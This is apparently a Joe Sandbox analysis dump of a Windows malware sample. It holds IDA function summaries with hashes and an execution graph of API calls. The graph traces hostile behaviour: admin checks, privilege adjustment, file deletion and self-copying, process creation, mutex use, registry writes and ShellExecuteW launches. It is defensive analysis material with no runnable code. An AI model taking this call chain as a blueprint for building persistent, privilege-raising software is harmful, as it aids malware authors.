                                                                                                                            • API String ID: 237123855-0
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 004243B6
                                                                                                                              • Part of subcall function 00424B82: __FF_MSGBANNER.LIBCMT ref: 00424B9B
                                                                                                                              • Part of subcall function 00424B82: __NMSG_WRITE.LIBCMT ref: 00424BA2
                                                                                                                              • Part of subcall function 00424B82: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0042BB22,00000000,00000001,00000000,?,0042A446,00000018,00437060,0000000C,0042A4D6), ref: 00424BC7
                                                                                                                            • std::exception::exception.LIBCMT ref: 004243EB
                                                                                                                            • std::exception::exception.LIBCMT ref: 00424405
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00424416
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1414122017-0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_memset
                                                                                                                            • String ID: lIC
                                                                                                                            • API String ID: 287624719-1893863216
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004029C8
                                                                                                                            • _memmove.LIBCMT ref: 00402A14
                                                                                                                              • Part of subcall function 00402C20: std::_Xinvalid_argument.LIBCPMT ref: 00402C3A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 2168136238-2556327735
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402864
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • _memmove.LIBCMT ref: 004028AC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 1785806476-2556327735
                                                                                                                            • Opcode ID: 1d5242a16f479ea2528b7710ebb57e5956869445dee1eae38c4e78c122620ff5
                                                                                                                            • Instruction ID: a87e7afb56152db4844304120ccc90d2fc77c79901bbf4eb6c8e40b04049be80
                                                                                                                            • Opcode Fuzzy Hash: 1d5242a16f479ea2528b7710ebb57e5956869445dee1eae38c4e78c122620ff5
                                                                                                                            • Instruction Fuzzy Hash: 1F110A371042105FEB24AD78A9C492BB798AB51324F204B3FE043926C1D7B9A84883A8
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027C5
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004027D8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                            • String ID: string too long
                                                                                                                            • API String ID: 963545896-2556327735
                                                                                                                            • Opcode ID: e292998421c8850a8da27620129f75394902549db40150187a796ef03a5c47e1
                                                                                                                            • Instruction ID: 064f40435e796dd26839fa1375d31275acd9165a4ba9a5abda85382cd89090f1
                                                                                                                            • Opcode Fuzzy Hash: e292998421c8850a8da27620129f75394902549db40150187a796ef03a5c47e1
                                                                                                                            • Instruction Fuzzy Hash: E811963A3047408BC3219E2CA944A16BBA5EBE2721F20467FE591977C1C7BAD805C3B9
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402D5F
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E4C
                                                                                                                              • Part of subcall function 00423E37: __CxxThrowException@8.LIBCMT ref: 00423E61
                                                                                                                              • Part of subcall function 00423E37: std::exception::exception.LIBCMT ref: 00423E72
                                                                                                                            • memmove.NTDLL(?,?,?,BFE90404,?,00402C55,00000004,?,?,?,004029B9,?,?,?,?,004010F4), ref: 00402D94
                                                                                                                            Strings
                                                                                                                            • invalid string position, xrefs: 00402D5A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                            • String ID: invalid string position
                                                                                                                            • API String ID: 1659287814-1799206989
                                                                                                                            • Opcode ID: 524a9378a5a4f359fa1b0d4246d43ae4ae0b0adc6430cbb09bf08ebab24e15fe
                                                                                                                            • Instruction ID: 1e4575317af22723dfc90c34203210abb019d66f2972e1f8230296fd7d489ede
                                                                                                                            • Opcode Fuzzy Hash: 524a9378a5a4f359fa1b0d4246d43ae4ae0b0adc6430cbb09bf08ebab24e15fe
                                                                                                                            • Instruction Fuzzy Hash: C201A2303007018BD7258E6CEE98A2AB7F6AFC5745B24093ED081D77C9D7B9DC428798
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: $gj
                                                                                                                            • API String ID: 2102423945-3974221788
                                                                                                                            • Opcode ID: 9492d8ccc2bcfc155a5516b9733526ba628274b6d30875e9f499e807b6103a50
                                                                                                                            • Instruction ID: d25502b6da0a0b66c229d91c22a28d008414b337d080cb476d7c62a5e50183e0
                                                                                                                            • Opcode Fuzzy Hash: 9492d8ccc2bcfc155a5516b9733526ba628274b6d30875e9f499e807b6103a50
                                                                                                                            • Instruction Fuzzy Hash: 6B016D76D0021C9BDB20EFA9D8416DDFB78AB49744F60425EE8147B342CB755906CFC9
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00402BC0
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423DFF
                                                                                                                              • Part of subcall function 00423DEA: __CxxThrowException@8.LIBCMT ref: 00423E14
                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • memmove.NTDLL(00000000,00000000,?,?,?,?,00402953,?,?,00000000,004011DD,BFE90404), ref: 00402BE1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                            • String ID: vector<T> too long
                                                                                                                            • API String ID: 1659287814-3788999226
                                                                                                                            • Opcode ID: c6f7fdbf214584f24f2236947a8c376ea8ecc5d3ecf50827547b74c81ed7cedf
                                                                                                                            • Instruction ID: 10d1b064c231672210bfe90d05fe3dc5ef501a4c2abe29e0a963277fe7030e2b
                                                                                                                            • Opcode Fuzzy Hash: c6f7fdbf214584f24f2236947a8c376ea8ecc5d3ecf50827547b74c81ed7cedf
                                                                                                                            • Instruction Fuzzy Hash: 03F06D712006055FD310DF69E98592AB7E9EF44305710452EE5A6D3691E774F9408668
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042F05E: __getptd.LIBCMT ref: 0042F064
                                                                                                                              • Part of subcall function 0042F05E: __getptd.LIBCMT ref: 0042F074
                                                                                                                            • __getptd.LIBCMT ref: 0042F583
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 0042F591
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                            • String ID: csm
                                                                                                                            • API String ID: 803148776-1018135373
                                                                                                                            • Opcode ID: 64e00e1577d43083ef32b3e8309f32e47d8481fc8a4d00176b3c120d1de4a5f9
                                                                                                                            • Instruction ID: e75760c1bfef3e269cdcdd64ebb75afa0e19efd270901459a5b22df1476f12ef
                                                                                                                            • Opcode Fuzzy Hash: 64e00e1577d43083ef32b3e8309f32e47d8481fc8a4d00176b3c120d1de4a5f9
                                                                                                                            • Instruction Fuzzy Hash: FB012874A00225ABCF349F62E450AAEB3F5AF14315FD4483FE44196792DB3899C9CB49
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0042951F
                                                                                                                              • Part of subcall function 0042A4BB: __mtinitlocknum.LIBCMT ref: 0042A4D1
                                                                                                                              • Part of subcall function 0042A4BB: __amsg_exit.LIBCMT ref: 0042A4DD
                                                                                                                              • Part of subcall function 0042A4BB: EnterCriticalSection.KERNEL32(00000000,00000000,?,00427493,0000000D), ref: 0042A4E5
                                                                                                                            • EnterCriticalSection.KERNEL32(?,XgC,004298D7,00000001,?,00436FF8,00000010,00424C68,00436E68,0000000C,00424D04,?,XgC,00000080,756F3475), ref: 00429538
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                                                                                            • String ID: XgC
                                                                                                                            • API String ID: 3996875869-1485261648
                                                                                                                            • Opcode ID: 65f251a41ca459828fcf54705edf6dbb2e64cc2b0def44c73ea8decc1a8a6430
                                                                                                                            • Instruction ID: 0c0e6288bb74e38c03d3acc2e6d49cf587f7ffeb63a82042cf818f3927628381
                                                                                                                            • Opcode Fuzzy Hash: 65f251a41ca459828fcf54705edf6dbb2e64cc2b0def44c73ea8decc1a8a6430
                                                                                                                            • Instruction Fuzzy Hash: 0DD012326002086BDB009B59E84AA4D37D8DB44238B948405F44DC7652DB79E8554A5C

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:11.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:99.4%
                                                                                                                            Signature Coverage:2.6%
                                                                                                                            Total number of Nodes:1775
                                                                                                                            Total number of Limit Nodes:47
21910->21915 21911 42abde 21912 424005 _free 66 API calls 21911->21912 21912->21913 21913->21845 21914 42bb56 __calloc_crt 66 API calls 21914->21915 21915->21911 21915->21913 21915->21914 21916 42ac04 21915->21916 21919 42ac1b 21915->21919 22100 424895 21915->22100 21917 424005 _free 66 API calls 21916->21917 21917->21913 22109 425a10 21919->22109 21921 42ac27 21921->21845 21923 42503a __IsNonwritableInCurrentImage 21922->21923 22128 42a7f2 21923->22128 21925 425058 __initterm_e 21927 425079 __IsNonwritableInCurrentImage 21925->21927 22131 42695b 76 API calls __cinit 21925->22131 21927->21849 22132 42c690 21928->22132 21932 41d52e CoInitializeEx AllocateAndInitializeSid 21933 41d57a CheckTokenMembership 21932->21933 21934 41d5ac SHGetFolderPathW 21932->21934 21935 41d593 21933->21935 21936 41d599 FreeSid 21933->21936 22135 421aa0 21934->22135 21935->21936 21936->21934 21938 41d5e6 CoCreateInstance CoCreateInstance 21939 41d65b 21938->21939 21940 41d68c ExitProcess 21939->21940 21941 41d694 _memset 21939->21941 21945 41d706 21941->21945 22284 425203 66 API calls _doexit 21941->22284 21943 41dc33 21944 423ebb TranslatorGuardHandler 5 API calls 21943->21944 21946 41dc50 21944->21946 21945->21943 21947 41d753 21945->21947 22285 425203 66 API calls _doexit 21945->22285 21946->21854 22022 425203 66 API calls _doexit 21946->22022 21949 41d76a 21947->21949 22286 425203 66 API calls _doexit 21947->22286 21951 41d784 7 API calls 21949->21951 22287 425203 66 API calls _doexit 21949->22287 22145 424820 21951->22145 21955 424820 __NMSG_WRITE 66 API calls 21956 41d80d 21955->21956 21957 424820 __NMSG_WRITE 66 API calls 21956->21957 21958 41d821 SHGetFolderPathW SHGetFolderPathW GetModuleFileNameW 21957->21958 21959 424895 __wcsdup 66 API calls 21958->21959 21960 41d861 21959->21960 21961 424820 __NMSG_WRITE 66 API calls 21960->21961 21962 41d875 DeleteFileW 21961->21962 22154 41e7a0 CreateFileW 21962->22154 21965 41d8a4 22157 41e810 GetCurrentProcess OpenProcessToken 
21965->22157 21966 41d8af 22164 41ddd0 21966->22164 21969 41d8bb 21970 41d8f3 21969->21970 21973 41d8d1 21969->21973 21974 41d90e CreateMutexW GetLastError 21970->21974 22183 41dee0 21970->22183 21972 41d906 21972->21943 21972->21974 21973->21974 21975 41d8dc 21973->21975 21974->21943 21977 41d92c _memset 21974->21977 22288 41ed00 99 API calls TranslatorGuardHandler 21975->22288 21979 41d93c GetVersionExW 21977->21979 21978 41d8e1 21978->21943 22289 41d210 12 API calls 2 library calls 21978->22289 22202 401bf0 21979->22202 21982 41d8ee 21982->21943 21983 41d959 22213 41e150 RegCreateKeyExW RegSetValueExW RegFlushKey RegCloseKey RegCreateKeyExW 21983->22213 21985 41d95e 22218 41efe0 21985->22218 21988 41efe0 97 API calls 21989 41d9ef CreateThread 21988->21989 21990 41da1c _memset 21989->21990 23582 41d390 21989->23582 22221 424cd4 21990->22221 21993 41da7c 21996 41da92 CreateThread 21993->21996 21997 41daaa CreateThread CreateThread SetThreadPriority WaitForSingleObject 21993->21997 21995 41da70 22254 424f0c 21995->22254 21996->21997 23551 41a030 21996->23551 22267 41dc60 21997->22267 23520 41e5b0 21997->23520 23537 413780 21997->23537 22000 41dae7 _memset 22290 42441c 22000->22290 22003 424820 __NMSG_WRITE 66 API calls 22004 41db33 ShellExecuteW 22003->22004 22005 42441c __NMSG_WRITE 66 API calls 22004->22005 22006 41db6a 22005->22006 22007 424820 __NMSG_WRITE 66 API calls 22006->22007 22008 41db80 ShellExecuteW 22007->22008 22009 42441c __NMSG_WRITE 66 API calls 22008->22009 22010 41dbb4 22009->22010 22011 424820 __NMSG_WRITE 66 API calls 22010->22011 22012 41dbca 22011->22012 22299 41e3f0 32 API calls TranslatorGuardHandler 22012->22299 22014 41dbd6 ShellExecuteW CreateThread WaitForSingleObject CreateThread WaitForSingleObject 22300 41e050 70 API calls 3 library calls 22014->22300 22016->21827 22017->21831 22022->21854 22023->21857 22024->21866 22025->21871 22026->21873 22029 42bb5f 22027->22029 22030 4277f8 22029->22030 22031 42bb7d Sleep 22029->22031 22035 
42cac0 22029->22035 22030->21874 22030->21880 22032 42bb92 22031->22032 22032->22029 22032->22030 22033->21884 22034->21868 22036 42cacc 22035->22036 22042 42cae7 22035->22042 22037 42cad8 22036->22037 22036->22042 22044 42570d 22037->22044 22039 42cafa RtlAllocateHeap 22041 42cb21 22039->22041 22039->22042 22041->22029 22042->22039 22042->22041 22047 426981 DecodePointer 22042->22047 22048 4274fd GetLastError 22044->22048 22046 425712 22046->22029 22047->22042 22062 4273d8 TlsGetValue 22048->22062 22051 42756a SetLastError 22051->22046 22052 42bb56 __calloc_crt 62 API calls 22053 427528 22052->22053 22053->22051 22054 427530 DecodePointer 22053->22054 22055 427545 22054->22055 22056 427561 22055->22056 22057 427549 22055->22057 22066 424005 22056->22066 22065 427449 66 API calls 4 library calls 22057->22065 22060 427551 GetCurrentThreadId 22060->22051 22061 427567 22061->22051 22063 427408 22062->22063 22064 4273ed RtlDecodePointer TlsSetValue 22062->22064 22063->22051 22063->22052 22064->22063 22065->22060 22067 424010 HeapFree 22066->22067 22071 424039 _free 22066->22071 22068 424025 22067->22068 22067->22071 22069 42570d __commit 64 API calls 22068->22069 22070 42402b GetLastError 22069->22070 22070->22071 22071->22061 22075 42bb1a 22072->22075 22074 42bb50 22074->21902 22075->22074 22076 42bb31 Sleep 22075->22076 22078 424b82 22075->22078 22077 42bb46 22076->22077 22077->22074 22077->22075 22079 424bff 22078->22079 22083 424b90 22078->22083 22099 426981 DecodePointer 22079->22099 22081 424c05 22084 42570d __commit 65 API calls 22081->22084 22082 424b9b 22082->22083 22095 4293bd 66 API calls __NMSG_WRITE 22082->22095 22096 42920e 66 API calls 7 library calls 22082->22096 22097 424fab GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 22082->22097 22083->22082 22086 424bbe RtlAllocateHeap 22083->22086 22089 424beb 22083->22089 22093 424be9 22083->22093 22098 426981 DecodePointer 22083->22098 22087 424bf7 22084->22087 22086->22083 22086->22087 
22087->22075 22092 42570d __commit 65 API calls 22089->22092 22092->22093 22094 42570d __commit 65 API calls 22093->22094 22094->22087 22095->22082 22096->22082 22098->22083 22099->22081 22101 4248aa 22100->22101 22102 4248a3 22100->22102 22103 42570d __commit 66 API calls 22101->22103 22102->22101 22107 4248cb 22102->22107 22104 4248af 22103->22104 22112 425a62 11 API calls __commit 22104->22112 22106 4248b9 22106->21915 22107->22106 22108 42570d __commit 66 API calls 22107->22108 22108->22104 22113 4258e7 22109->22113 22112->22106 22114 425906 _memset __call_reportfault 22113->22114 22115 425924 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 22114->22115 22116 4259f2 __call_reportfault 22115->22116 22119 423ebb 22116->22119 22118 425a0e GetCurrentProcess TerminateProcess 22118->21921 22120 423ec3 22119->22120 22121 423ec5 IsDebuggerPresent 22119->22121 22120->22118 22127 42af1f 22121->22127 22124 425604 SetUnhandledExceptionFilter UnhandledExceptionFilter 22125 425621 __call_reportfault 22124->22125 22126 425629 GetCurrentProcess TerminateProcess 22124->22126 22125->22126 22126->22118 22127->22124 22129 42a7f8 EncodePointer 22128->22129 22129->22129 22130 42a812 22129->22130 22130->21925 22131->21927 22133 41d4ec LoadStringW LoadStringW 22132->22133 22134 41e8a0 LoadIconW LoadCursorW LoadIconW RegisterClassExW 22133->22134 22134->21932 22136 421b00 22135->22136 22137 421aae 22135->22137 22136->21938 22138 421ab0 GetTickCount 22137->22138 22301 425318 22138->22301 22141 421abc 22142 425318 66 API calls 22141->22142 22304 42532a 22141->22304 22143 421adb Sleep 22142->22143 22143->22138 22144 421af2 22143->22144 22144->21938 22146 424835 22145->22146 22148 42482e 22145->22148 22147 42570d __commit 66 API calls 22146->22147 22149 42483a 22147->22149 22148->22146 22152 42486a 22148->22152 22313 425a62 11 API calls __commit 22149->22313 22151 41d7fa 22151->21955 22152->22151 22153 42570d __commit 66 API calls 22152->22153 22153->22149 22155 
41d888 LookupPrivilegeValueA 22154->22155 22156 41e7c8 SetFilePointer ReadFile CloseHandle 22154->22156 22155->21965 22155->21966 22156->22155 22158 41e848 AdjustTokenPrivileges CloseHandle 22157->22158 22159 41e83a 22157->22159 22161 423ebb TranslatorGuardHandler 5 API calls 22158->22161 22160 423ebb TranslatorGuardHandler 5 API calls 22159->22160 22162 41e844 22160->22162 22163 41e890 22161->22163 22162->21966 22163->21966 22165 41dde7 SetLastError 22164->22165 22166 41ddfa GetCurrentProcess OpenProcessToken 22164->22166 22165->21969 22167 41de12 GetLastError 22166->22167 22168 41de1d GetTokenInformation 22166->22168 22169 41de91 22167->22169 22170 41de4a LocalAlloc 22168->22170 22171 41de3c GetLastError 22168->22171 22175 41dea5 22169->22175 22176 41de9b CloseHandle 22169->22176 22173 41de63 GetTokenInformation 22170->22173 22174 41de5c GetLastError 22170->22174 22171->22170 22172 41de43 GetLastError 22171->22172 22172->22169 22177 41de78 GetLastError 22173->22177 22178 41de7f GetSidSubAuthority 22173->22178 22174->22169 22179 41deb3 22175->22179 22180 41dea9 LocalFree 22175->22180 22176->22175 22177->22169 22178->22169 22181 41deb9 SetLastError 22179->22181 22182 41deca 22179->22182 22180->22179 22181->21969 22182->21969 22184 41def0 _memset __write_nolock 22183->22184 22185 421aa0 68 API calls 22184->22185 22186 41df29 PathFindFileNameW 22185->22186 22314 41f000 22186->22314 22189 41e039 22192 423ebb TranslatorGuardHandler 5 API calls 22189->22192 22190 41df8e 22191 41f000 97 API calls 22190->22191 22193 41dfaf _memset 22191->22193 22194 41e04b 22192->22194 22195 41dfc0 CopyFileW 22193->22195 22196 41dfdc CreateProcessW 22193->22196 22194->21972 22195->22193 22196->22195 22197 41e01b 22196->22197 22317 41e050 70 API calls 3 library calls 22197->22317 22199 41e020 22200 423ebb TranslatorGuardHandler 5 API calls 22199->22200 22201 41e035 22200->22201 22201->21972 22356 401a20 RegCreateKeyExW 22202->22356 22204 401bf6 22205 401c11 22204->22205 22369 417900 
22204->22369 22393 401900 22205->22393 22209 401c61 22209->21983 22214 41e1e0 22213->22214 22214->22214 22215 41e1eb RegSetValueExW RegFlushKey RegCloseKey RegCreateKeyExW 22214->22215 22216 41e240 22215->22216 22216->22216 22217 41e24b RegSetValueExW RegFlushKey RegCloseKey 22216->22217 22217->21985 22923 424b03 22218->22923 22222 424ce1 22221->22222 22223 424cf4 22221->22223 22225 42570d __commit 66 API calls 22222->22225 22961 424c16 22223->22961 22227 424ce6 22225->22227 22226 424d04 22228 41da42 22226->22228 22230 42570d __commit 66 API calls 22226->22230 22980 425a62 11 API calls __commit 22227->22980 22228->21993 22231 424d26 22228->22231 22230->22228 22232 424d32 __commit 22231->22232 22233 424d45 22232->22233 22235 424d69 22232->22235 22234 42570d __commit 66 API calls 22233->22234 22236 424d4a 22234->22236 23403 4294cd 22235->23403 23439 425a62 11 API calls __commit 22236->23439 22240 424de7 22242 424e10 22240->22242 23409 429ce2 22240->23409 23449 424e28 LeaveCriticalSection LeaveCriticalSection _fprintf 22242->23449 22246 424d55 __commit 22246->21995 22250 424d82 22250->22240 22251 42570d __commit 66 API calls 22250->22251 22252 424ddc 22251->22252 23447 425a62 11 API calls __commit 22252->23447 22255 424f18 __commit 22254->22255 22256 424f2a 22255->22256 22257 424f3f 22255->22257 22258 42570d __commit 66 API calls 22256->22258 22260 4294cd __lock_file 67 API calls 22257->22260 22265 424f3a __commit 22257->22265 22259 424f2f 22258->22259 23479 425a62 11 API calls __commit 22259->23479 22262 424f58 22260->22262 23463 424e9f 22262->23463 22265->21993 22268 41dc6d _memset __write_nolock 22267->22268 22269 42441c __NMSG_WRITE 66 API calls 22268->22269 22270 41dcae 22269->22270 22271 424820 __NMSG_WRITE 66 API calls 22270->22271 22272 41dcc4 CreateFileW 22271->22272 22273 41dcfb WriteFile FlushFileBuffers CloseHandle 22272->22273 22274 41ddbd 22272->22274 22278 42441c __NMSG_WRITE 66 API calls 22273->22278 22275 423ebb TranslatorGuardHandler 5 API calls 
